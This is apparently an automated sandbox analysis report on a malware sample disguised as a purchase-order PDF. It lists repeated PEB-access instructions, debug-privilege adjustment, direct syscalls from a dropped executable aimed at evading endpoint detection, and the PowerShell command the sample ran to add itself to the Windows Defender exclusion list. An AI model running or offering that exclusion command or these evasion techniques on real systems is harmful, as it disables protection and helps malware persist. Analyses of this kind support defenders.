Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019529A0 mov eax, dword ptr fs:[00000030h]	6_2_019529A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019529A0 mov eax, dword ptr fs:[00000030h]	6_2_019529A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019529A0 mov eax, dword ptr fs:[00000030h]	6_2_019529A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019529A0 mov eax, dword ptr fs:[00000030h]	6_2_019529A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019529A0 mov eax, dword ptr fs:[00000030h]	6_2_019529A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019529A0 mov eax, dword ptr fs:[00000030h]	6_2_019529A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019529A0 mov eax, dword ptr fs:[00000030h]	6_2_019529A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019529A0 mov eax, dword ptr fs:[00000030h]	6_2_019529A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019529A0 mov eax, dword ptr fs:[00000030h]	6_2_019529A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019529A0 mov eax, dword ptr fs:[00000030h]	6_2_019529A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019529A0 mov eax, dword ptr fs:[00000030h]	6_2_019529A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019409AD mov eax, dword ptr fs:[00000030h]	6_2_019409AD
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019409AD mov eax, dword ptr fs:[00000030h]	6_2_019409AD
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0194A9D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0194A9D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0194A9D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0194A9D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0194A9D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0194A9D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019749D0 mov eax, dword ptr fs:[00000030h]	6_2_019749D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D69C0 mov eax, dword ptr fs:[00000030h]	6_2_019D69C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019729F9 mov eax, dword ptr fs:[00000030h]	6_2_019729F9
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019729F9 mov eax, dword ptr fs:[00000030h]	6_2_019729F9
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0A9D3 mov eax, dword ptr fs:[00000030h]	6_2_01A0A9D3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019CE9E0 mov eax, dword ptr fs:[00000030h]	6_2_019CE9E0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01938918 mov eax, dword ptr fs:[00000030h]	6_2_01938918
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01938918 mov eax, dword ptr fs:[00000030h]	6_2_01938918
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019CC912 mov eax, dword ptr fs:[00000030h]	6_2_019CC912
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BE908 mov eax, dword ptr fs:[00000030h]	6_2_019BE908
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BE908 mov eax, dword ptr fs:[00000030h]	6_2_019BE908
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C892A mov eax, dword ptr fs:[00000030h]	6_2_019C892A
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D892B mov eax, dword ptr fs:[00000030h]	6_2_019D892B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C0946 mov eax, dword ptr fs:[00000030h]	6_2_019C0946
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019CC97C mov eax, dword ptr fs:[00000030h]	6_2_019CC97C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E4978 mov eax, dword ptr fs:[00000030h]	6_2_019E4978
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E4978 mov eax, dword ptr fs:[00000030h]	6_2_019E4978
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01966962 mov eax, dword ptr fs:[00000030h]	6_2_01966962
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01966962 mov eax, dword ptr fs:[00000030h]	6_2_01966962
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01966962 mov eax, dword ptr fs:[00000030h]	6_2_01966962
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0198096E mov eax, dword ptr fs:[00000030h]	6_2_0198096E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0198096E mov edx, dword ptr fs:[00000030h]	6_2_0198096E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0198096E mov eax, dword ptr fs:[00000030h]	6_2_0198096E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019CC89D mov eax, dword ptr fs:[00000030h]	6_2_019CC89D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01940887 mov eax, dword ptr fs:[00000030h]	6_2_01940887
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0A8E4 mov eax, dword ptr fs:[00000030h]	6_2_01A0A8E4
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196E8C0 mov eax, dword ptr fs:[00000030h]	6_2_0196E8C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A108C0 mov eax, dword ptr fs:[00000030h]	6_2_01A108C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197C8F9 mov eax, dword ptr fs:[00000030h]	6_2_0197C8F9
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197C8F9 mov eax, dword ptr fs:[00000030h]	6_2_0197C8F9
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019CC810 mov eax, dword ptr fs:[00000030h]	6_2_019CC810
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01962835 mov eax, dword ptr fs:[00000030h]	6_2_01962835
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01962835 mov eax, dword ptr fs:[00000030h]	6_2_01962835
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01962835 mov eax, dword ptr fs:[00000030h]	6_2_01962835
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01962835 mov ecx, dword ptr fs:[00000030h]	6_2_01962835
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01962835 mov eax, dword ptr fs:[00000030h]	6_2_01962835
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01962835 mov eax, dword ptr fs:[00000030h]	6_2_01962835
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E483A mov eax, dword ptr fs:[00000030h]	6_2_019E483A
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E483A mov eax, dword ptr fs:[00000030h]	6_2_019E483A
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197A830 mov eax, dword ptr fs:[00000030h]	6_2_0197A830
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01970854 mov eax, dword ptr fs:[00000030h]	6_2_01970854
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01944859 mov eax, dword ptr fs:[00000030h]	6_2_01944859
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01944859 mov eax, dword ptr fs:[00000030h]	6_2_01944859
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01952840 mov ecx, dword ptr fs:[00000030h]	6_2_01952840
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D6870 mov eax, dword ptr fs:[00000030h]	6_2_019D6870
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D6870 mov eax, dword ptr fs:[00000030h]	6_2_019D6870
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019CE872 mov eax, dword ptr fs:[00000030h]	6_2_019CE872
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019CE872 mov eax, dword ptr fs:[00000030h]	6_2_019CE872
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950BBE mov eax, dword ptr fs:[00000030h]	6_2_01950BBE
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950BBE mov eax, dword ptr fs:[00000030h]	6_2_01950BBE
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F4BB0 mov eax, dword ptr fs:[00000030h]	6_2_019F4BB0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F4BB0 mov eax, dword ptr fs:[00000030h]	6_2_019F4BB0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EEBD0 mov eax, dword ptr fs:[00000030h]	6_2_019EEBD0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01940BCD mov eax, dword ptr fs:[00000030h]	6_2_01940BCD
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01940BCD mov eax, dword ptr fs:[00000030h]	6_2_01940BCD
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01940BCD mov eax, dword ptr fs:[00000030h]	6_2_01940BCD
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01960BCB mov eax, dword ptr fs:[00000030h]	6_2_01960BCB
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01960BCB mov eax, dword ptr fs:[00000030h]	6_2_01960BCB
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01960BCB mov eax, dword ptr fs:[00000030h]	6_2_01960BCB
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01948BF0 mov eax, dword ptr fs:[00000030h]	6_2_01948BF0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01948BF0 mov eax, dword ptr fs:[00000030h]	6_2_01948BF0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01948BF0 mov eax, dword ptr fs:[00000030h]	6_2_01948BF0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196EBFC mov eax, dword ptr fs:[00000030h]	6_2_0196EBFC
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019CCBF0 mov eax, dword ptr fs:[00000030h]	6_2_019CCBF0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BEB1D mov eax, dword ptr fs:[00000030h]	6_2_019BEB1D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BEB1D mov eax, dword ptr fs:[00000030h]	6_2_019BEB1D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BEB1D mov eax, dword ptr fs:[00000030h]	6_2_019BEB1D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BEB1D mov eax, dword ptr fs:[00000030h]	6_2_019BEB1D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BEB1D mov eax, dword ptr fs:[00000030h]	6_2_019BEB1D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BEB1D mov eax, dword ptr fs:[00000030h]	6_2_019BEB1D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BEB1D mov eax, dword ptr fs:[00000030h]	6_2_019BEB1D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BEB1D mov eax, dword ptr fs:[00000030h]	6_2_019BEB1D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BEB1D mov eax, dword ptr fs:[00000030h]	6_2_019BEB1D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A08B28 mov eax, dword ptr fs:[00000030h]	6_2_01A08B28
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A08B28 mov eax, dword ptr fs:[00000030h]	6_2_01A08B28
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196EB20 mov eax, dword ptr fs:[00000030h]	6_2_0196EB20
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196EB20 mov eax, dword ptr fs:[00000030h]	6_2_0196EB20
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EEB50 mov eax, dword ptr fs:[00000030h]	6_2_019EEB50
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F4B4B mov eax, dword ptr fs:[00000030h]	6_2_019F4B4B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F4B4B mov eax, dword ptr fs:[00000030h]	6_2_019F4B4B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E8B42 mov eax, dword ptr fs:[00000030h]	6_2_019E8B42
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D6B40 mov eax, dword ptr fs:[00000030h]	6_2_019D6B40
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D6B40 mov eax, dword ptr fs:[00000030h]	6_2_019D6B40
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0AB40 mov eax, dword ptr fs:[00000030h]	6_2_01A0AB40
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193CB7E mov eax, dword ptr fs:[00000030h]	6_2_0193CB7E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01978A90 mov edx, dword ptr fs:[00000030h]	6_2_01978A90
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194EA80 mov eax, dword ptr fs:[00000030h]	6_2_0194EA80
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194EA80 mov eax, dword ptr fs:[00000030h]	6_2_0194EA80
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194EA80 mov eax, dword ptr fs:[00000030h]	6_2_0194EA80
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194EA80 mov eax, dword ptr fs:[00000030h]	6_2_0194EA80
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194EA80 mov eax, dword ptr fs:[00000030h]	6_2_0194EA80
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194EA80 mov eax, dword ptr fs:[00000030h]	6_2_0194EA80
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194EA80 mov eax, dword ptr fs:[00000030h]	6_2_0194EA80
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194EA80 mov eax, dword ptr fs:[00000030h]	6_2_0194EA80
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194EA80 mov eax, dword ptr fs:[00000030h]	6_2_0194EA80
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A14A80 mov eax, dword ptr fs:[00000030h]	6_2_01A14A80
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01948AA0 mov eax, dword ptr fs:[00000030h]	6_2_01948AA0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01948AA0 mov eax, dword ptr fs:[00000030h]	6_2_01948AA0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01996AA4 mov eax, dword ptr fs:[00000030h]	6_2_01996AA4
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01940AD0 mov eax, dword ptr fs:[00000030h]	6_2_01940AD0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01974AD0 mov eax, dword ptr fs:[00000030h]	6_2_01974AD0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01974AD0 mov eax, dword ptr fs:[00000030h]	6_2_01974AD0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01996ACC mov eax, dword ptr fs:[00000030h]	6_2_01996ACC
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01996ACC mov eax, dword ptr fs:[00000030h]	6_2_01996ACC
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01996ACC mov eax, dword ptr fs:[00000030h]	6_2_01996ACC
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197AAEE mov eax, dword ptr fs:[00000030h]	6_2_0197AAEE
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197AAEE mov eax, dword ptr fs:[00000030h]	6_2_0197AAEE
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019CCA11 mov eax, dword ptr fs:[00000030h]	6_2_019CCA11
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01964A35 mov eax, dword ptr fs:[00000030h]	6_2_01964A35
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01964A35 mov eax, dword ptr fs:[00000030h]	6_2_01964A35
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197CA24 mov eax, dword ptr fs:[00000030h]	6_2_0197CA24
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196EA2E mov eax, dword ptr fs:[00000030h]	6_2_0196EA2E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01946A50 mov eax, dword ptr fs:[00000030h]	6_2_01946A50
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01946A50 mov eax, dword ptr fs:[00000030h]	6_2_01946A50
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01946A50 mov eax, dword ptr fs:[00000030h]	6_2_01946A50
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01946A50 mov eax, dword ptr fs:[00000030h]	6_2_01946A50
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01946A50 mov eax, dword ptr fs:[00000030h]	6_2_01946A50
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01946A50 mov eax, dword ptr fs:[00000030h]	6_2_01946A50
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01946A50 mov eax, dword ptr fs:[00000030h]	6_2_01946A50
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950A5B mov eax, dword ptr fs:[00000030h]	6_2_01950A5B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950A5B mov eax, dword ptr fs:[00000030h]	6_2_01950A5B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BCA72 mov eax, dword ptr fs:[00000030h]	6_2_019BCA72
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BCA72 mov eax, dword ptr fs:[00000030h]	6_2_019BCA72
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197CA6F mov eax, dword ptr fs:[00000030h]	6_2_0197CA6F
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197CA6F mov eax, dword ptr fs:[00000030h]	6_2_0197CA6F
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197CA6F mov eax, dword ptr fs:[00000030h]	6_2_0197CA6F
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EEA60 mov eax, dword ptr fs:[00000030h]	6_2_019EEA60
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A14DAD mov eax, dword ptr fs:[00000030h]	6_2_01A14DAD
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A08DAE mov eax, dword ptr fs:[00000030h]	6_2_01A08DAE
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A08DAE mov eax, dword ptr fs:[00000030h]	6_2_01A08DAE
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197CDB1 mov ecx, dword ptr fs:[00000030h]	6_2_0197CDB1
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197CDB1 mov eax, dword ptr fs:[00000030h]	6_2_0197CDB1
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197CDB1 mov eax, dword ptr fs:[00000030h]	6_2_0197CDB1
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01968DBF mov eax, dword ptr fs:[00000030h]	6_2_01968DBF
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01968DBF mov eax, dword ptr fs:[00000030h]	6_2_01968DBF

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0005082025 pdf.exe"
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0005082025 pdf.exe"			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
